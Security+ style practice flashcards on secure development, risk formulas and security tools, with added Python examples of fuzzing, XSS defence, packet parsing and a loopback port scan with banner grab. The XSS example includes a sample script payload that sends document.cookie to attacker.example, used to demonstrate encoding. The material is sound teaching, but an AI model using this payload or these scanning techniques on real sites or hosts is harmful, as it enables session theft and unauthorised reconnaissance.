Practice Questions 121-132 Flashcards
Management at your organization is planning to hire a development firm to create a sophisticated web application. One of the primary goals is to ensure that personnel involved with the project frequently collaborate with each other throughout the project. Which is an appropriate model for this project? A. Waterfall B. SDLC C. Agile D. Secure DevOps
The agile software development model is flexible, ensures that personnel interact with each other throughout a project, and is the best of the available choices. Waterfall moves through fixed phases with little ongoing collaboration, and the SDLC and Secure DevOps are broader frameworks rather than a collaboration model.
Your organization is preparing to deploy a web-based application which will accept user input. Which is the BEST test of the reliability of this application to maintain availability and data integrity? A. Model verification B. Input validation C. Error handling D. Dynamic analysis
Dynamic analysis techniques (such as fuzzing) test a running application's ability to maintain availability and data integrity. Fuzzing sends random or malformed data to the application to verify that unexpected input does not crash it or expose the system to a data breach. Input validation and error handling are controls built into the application, not tests of it.
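As an added illustration of the fuzzing described above (this is example code written for this card, not from the original source), the harness below mutates a well-formed input and records every input that makes a parser die with an unexpected exception. The record format, both parsers and the seed input are constructed for the example; the naive parser trusts its length byte and so can be crashed, while the hardened one rejects bad input cleanly.

```python
import random


def make_record(payload: bytes) -> bytes:
    """Build a valid record in the constructed toy format [len][payload][checksum]."""
    return bytes([len(payload)]) + payload + bytes([sum(payload) % 256])


def parse_record(data: bytes) -> bytes:
    """Constructed parser that trusts the length byte.

    When the length byte claims more data than is present, the checksum index
    runs off the end of the buffer and the parser dies with IndexError instead
    of rejecting the input: the kind of availability bug fuzzing surfaces.
    """
    n = data[0]
    payload = data[1:1 + n]
    checksum = data[1 + n]
    if sum(payload) % 256 != checksum:
        raise ValueError("bad checksum")
    return payload


def parse_record_hardened(data: bytes) -> bytes:
    """Same format, but every untrusted field is checked before it is used."""
    if len(data) < 2:
        raise ValueError("record too short")
    n = data[0]
    if len(data) != n + 2:
        raise ValueError("length byte does not match record size")
    payload = data[1:1 + n]
    if sum(payload) % 256 != data[1 + n]:
        raise ValueError("bad checksum")
    return payload


def mutate(seed_input: bytes, rng: random.Random) -> bytes:
    """One random mutation of the seed: flip a bit, overwrite a byte, or drop a byte."""
    data = bytearray(seed_input)
    i = rng.randrange(len(data))
    strategy = rng.randrange(3)
    if strategy == 0:
        data[i] ^= 1 << rng.randrange(8)
    elif strategy == 1:
        data[i] = rng.randrange(256)
    else:
        del data[i]
    return bytes(data)


def fuzz(parser, seed_input: bytes, iterations: int = 500, seed: int = 1) -> list:
    """Feed mutated inputs to `parser` and collect the ones that crash it.

    ValueError is the parser rejecting bad input on purpose, so it is not a
    finding; any other exception means the input reached code that did not
    expect it. The RNG is seeded so a run can be reproduced.
    """
    rng = random.Random(seed)
    crashes = []
    for _ in range(iterations):
        case = mutate(seed_input, rng)
        try:
            parser(case)
        except ValueError:
            continue
        except Exception as exc:  # catching everything is the point of a fuzz harness
            crashes.append((case, type(exc).__name__))
    return crashes


SEED_INPUT = make_record(b"hello")  # constructed, well-formed starting point

if __name__ == "__main__":
    for name, parser in (("naive", parse_record), ("hardened", parse_record_hardened)):
        found = fuzz(parser, SEED_INPUT)
        print(f"{name}: {len(found)} crashing inputs")
        for case, exc_name in found[:3]:
            print(f"  {exc_name}: {case!r}")
```

Real fuzzers (AFL++, libFuzzer) add coverage feedback so mutations that reach new code are kept as seeds, but the loop is the same: mutate, run, and treat any unhandled exception or signal as a finding.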
An attacker has launched several successful XSS attacks on a web application within your DMZ. Which is the BEST choice to protect the web server and prevent this attack? Select 2. A. Dynamic code analysis B. Input validation C. Code obfuscation D. WAF
Input validation and a web application firewall (WAF) are the best choices because both provide protection against cross-site scripting (XSS) attacks. Input validation checks data before using it, which helps prevent XSS attacks.
A WAF acts as an additional firewall that monitors, filters or blocks HTTP traffic to a web server.
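As an added example for this card (written here, not part of the original material), the code below shows the two application-side halves of the control: allowlist input validation for a field with a known shape, and HTML output encoding for free text. The vulnerable and safe renderers, the username pattern and the attacker payload are all constructed for the example; `attacker.example` is a reserved name that does not resolve.

```python
import html
import re

# Allowlist: the only characters a username can legitimately contain (constructed policy).
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(value: str) -> bool:
    """Input validation: accept only values that fully match the allowlist pattern."""
    return USERNAME_RE.fullmatch(value) is not None


def render_greeting_vulnerable(name: str) -> str:
    """Reflects untrusted input into HTML unchanged: a reflected XSS sink."""
    return f"<p>Hello, {name}!</p>"


def render_greeting_safe(name: str) -> str:
    """Validate on input, then encode on output so the browser never parses the value as markup."""
    if not is_valid_username(name):
        raise ValueError("rejected input")
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


def render_comment_safe(text: str) -> str:
    """Free text cannot be allowlisted as tightly as a username, so output encoding is the control that matters."""
    return f'<div class="comment">{html.escape(text, quote=True)}</div>'


# Constructed attacker input of the kind a WAF rule or validator must stop.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'

if __name__ == "__main__":
    print("vulnerable:", render_greeting_vulnerable(PAYLOAD))
    print("encoded:   ", render_comment_safe(PAYLOAD))
    print("validated: ", is_valid_username(PAYLOAD))
```

The WAF sits in front of the server and applies signature or anomaly rules to the same request before it reaches this code; it is a second layer, not a substitute, because validation and encoding in the application still protect against payloads the WAF's rules miss.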
Ziffcorp is developing a new technology that it expects to become a huge success when it's released. The CIO is concerned about someone stealing the company's secrets related to this technology. Which will help the CIO identify potential dangers related to the loss of this technology? A. Threat assessment B. Vulnerability assessment C. Privacy threshold assessment D. Privacy impact assessment
A threat assessment evaluates potential dangers that can compromise the confidentiality, integrity and availability of data or a system. It evaluates threats and attempts to identify the potential impact from those threats. A vulnerability assessment looks for weaknesses rather than dangers, and the privacy assessments concern personal data, not trade secrets.
You are performing a risk assessment and you need to calculate the average expected loss of an incident. Which value combination would you MOST likely use? A. ALE and ARO B. ALE and SLE C. SLE and ARO D. ARO and ROI
The average expected loss from a single incident is the single loss expectancy (SLE). The annual loss expectancy (ALE) is the SLE multiplied by the annual rate of occurrence (ARO), so when ALE and ARO are known, SLE is found by dividing:
ALE = SLE × ARO, therefore SLE = ALE / ARO
You recently completed a vulnerability scan on your network. It reported that several servers are missing key operating system patches. However, after checking the servers, you've verified the servers have these patches installed. Which BEST describes this? A. False negative B. Misconfiguration on servers C. False positive D. Non-credentialed scan
The vulnerability scanner reported a false positive: it indicated that the servers had a vulnerability when in reality they did not. A false negative is the opposite case, where a real vulnerability goes unreported.
You want to identify all the services running on a server in your network. Which tool is the BEST choice to meet this goal? A. Penetration test B. Protocol analyzer C. Sniffer D. Port scanner
A port scanner identifies open ports in a system and is commonly used to determine what services are running on the system.
Lisa needs to identify if a risk exists within a web application and identify potential misconfigurations on the server. However, she should passively test the security controls. Which is the BEST choice to meet this goal?
A. Perform a penetration test.
B. Perform a port scan
C. Perform a vulnerability scan
D. Perform traffic analysis with a sniffer.
A vulnerability scan identifies vulnerabilities that attackers can potentially exploit, and vulnerability scanners perform passive testing: they report what they find without attempting to exploit it. A penetration test is active and can disrupt the system, and a port scan or sniffer will not reveal web application risks or server misconfigurations.
A network administrator needs to identify the type of traffic and packet flags used in traffic sent from a specific IP address. Which is the BEST tool to meet this goal? A. SIEM B. Netcat C. Protocol analyzer D. Vulnerability scan
A protocol analyzer (sniffer) captures traffic sent over a network and can identify the type of traffic, the source of the traffic, and the protocol flags (such as TCP SYN or ACK) used within individual packets.
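As an added example of what a protocol analyzer does with a captured packet (code written for this card, not from the original source), the block below decodes the IPv4 and TCP headers of raw packets, extracts the flag bits, and filters a capture down to one source address the way a sniffer display filter would. The packets are a constructed three-way handshake built with `struct`, with checksums left at zero, and the addresses and ports are made up.

```python
import ipaddress
import struct

TCP_FLAG_BITS = (("FIN", 0x01), ("SYN", 0x02), ("RST", 0x04), ("PSH", 0x08),
                 ("ACK", 0x10), ("URG", 0x20), ("ECE", 0x40), ("CWR", 0x80))
IP_PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}


def build_tcp_packet(src: str, dst: str, sport: int, dport: int, flags: int, ttl: int = 64) -> bytes:
    """Construct an IPv4 packet carrying an empty TCP segment (sample data; checksums left zero)."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1, 0, (5 << 12) | flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, ttl, 6, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return ip + tcp


def parse_packet(raw: bytes) -> dict:
    """Decode the IPv4 header and, for TCP, the ports and the flag bits."""
    if len(raw) < 20:
        raise ValueError("truncated IPv4 header")
    (version_ihl, _tos, _total_len, _ident, _frag, ttl, proto,
     _cksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if version_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (version_ihl & 0x0F) * 4  # header length in bytes; options make it longer than 20
    info = {"src": str(ipaddress.IPv4Address(src)), "dst": str(ipaddress.IPv4Address(dst)),
            "protocol": IP_PROTOCOLS.get(proto, str(proto)), "ttl": ttl}
    if proto == 6:
        if len(raw) < ihl + 20:
            raise ValueError("truncated TCP header")
        (sport, dport, _seq, _ack, offset_flags, _win,
         _tcksum, _urg) = struct.unpack("!HHIIHHHH", raw[ihl:ihl + 20])
        flag_bits = offset_flags & 0x00FF  # low byte holds the eight classic flags; bit 8 is NS
        info.update(sport=sport, dport=dport,
                    flags=[name for name, bit in TCP_FLAG_BITS if flag_bits & bit])
    return info


def traffic_from(packets, source_ip: str) -> list:
    """Keep only packets sent from one address, like a sniffer display filter on ip.src."""
    decoded = [parse_packet(p) for p in packets]
    return [info for info in decoded if info["src"] == source_ip]


# Constructed handshake plus one data segment between two private addresses.
SAMPLE_CAPTURE = [
    build_tcp_packet("192.168.1.10", "10.0.0.5", 40000, 443, 0x02),   # SYN
    build_tcp_packet("10.0.0.5", "192.168.1.10", 443, 40000, 0x12),   # SYN/ACK
    build_tcp_packet("192.168.1.10", "10.0.0.5", 40000, 443, 0x10),   # ACK
    build_tcp_packet("192.168.1.10", "10.0.0.5", 40000, 443, 0x18),   # PSH/ACK
]

if __name__ == "__main__":
    for info in traffic_from(SAMPLE_CAPTURE, "192.168.1.10"):
        print(f"{info['src']}:{info['sport']} -> {info['dst']}:{info['dport']} "
              f"{info['protocol']} {'/'.join(info['flags'])}")
```

A real analyzer such as Wireshark or tcpdump reads the same fields from the wire; the equivalent tcpdump filter for the question's scenario is `tcpdump -nn src host 192.168.1.10`, which prints each packet's flags in its `Flags [S]`, `Flags [S.]` notation.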
Lisa has been hired as a penetration tester by your organization to test the security of a web server. She wants to identify the operating system and get some information on services and applications used by the server. Which tool is BEST to meet this need? A. SIEM B. Netcat C. Tcpdump D. Gray box test
Netcat can easily be used for banner grabbing, and the banner will give her information on the operating system and on the services and applications used by the server. A SIEM aggregates logs, tcpdump only captures traffic, and a gray box test describes how much knowledge a tester is given, not a tool.
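As an added example covering both the port-scanner card above and the banner-grabbing card here (code written for these cards, not from the original source), the block below starts a throwaway loopback service that greets clients with a constructed banner, runs a TCP connect scan over a few ports around it, and then grabs the banner from the port the scan found open. The banner string and the service are invented for the example; the real-world equivalents are `nmap -sV host` for the scan and `nc -v host port` for the grab.

```python
import socket
import threading

BANNER = b"SSH-2.0-ConstructedService_1.0\r\n"  # constructed; not a real product string


def start_banner_service(banner: bytes = BANNER):
    """Stand-in for a real service: listen on a free loopback port and greet every client with `banner`."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0 lets the OS pick a free ephemeral port
    srv.listen(5)
    srv.settimeout(0.2)          # so the accept loop can notice the stop flag
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                return       # listener closed
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:
                    pass

    threading.Thread(target=serve, daemon=True).start()
    return srv, port, stop


def scan_ports(host: str, ports, timeout: float = 0.5) -> list:
    """TCP connect scan: a completed three-way handshake means something is listening."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def grab_banner(host: str, port: int, timeout: float = 2.0) -> str:
    """Connect and read whatever the service volunteers, as `nc -v host port` would display."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            data = s.recv(1024)
        except socket.timeout:
            data = b""       # some services stay silent until the client speaks first
    return data.decode(errors="replace").strip()


def run_demo() -> dict:
    """Scan a small window of ports around the test service, then grab its banner."""
    srv, port, stop = start_banner_service()
    try:
        open_ports = scan_ports("127.0.0.1", range(port - 2, port + 3))
        banner = grab_banner("127.0.0.1", port)
    finally:
        stop.set()
        srv.close()
    return {"port": port, "open_ports": open_ports, "banner": banner}


if __name__ == "__main__":
    result = run_demo()
    print(f"open ports near {result['port']}: {result['open_ports']}")
    print(f"banner on {result['port']}: {result['banner']}")
```

A connect scan completes the handshake, so it shows up in the target's logs; on a real engagement the scan window is the full port range, and services that do not speak first (HTTP, for example) need a probe such as `HEAD / HTTP/1.0` sent before the banner appears.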
An organization wants to provide protection against malware attacks. Administrators have installed antivirus software on all computers. Additionally, they implemented a firewall and an IDS on the network. Which BEST identifies this principle? A. Implicit deny B. Layered security C. Least privilege D. Flood guard
Layered security (defense in depth) implements multiple controls to provide several layers of protection.
A security professional needs to identify a physical security control that will identify and authenticate individuals before allowing them to pass, and restrict passage to only a single person at a time. Which should the professional recommend? A. Tailgating B. Smart cards C. Biometrics D. Mantraps
Mantraps control access to a secure area and allow only a single person to pass at a time. In this scenario, tailgating is the social engineering tactic that the mantrap prevents, not a control. Smart cards and biometrics can authenticate a person but do not restrict passage to one person at a time.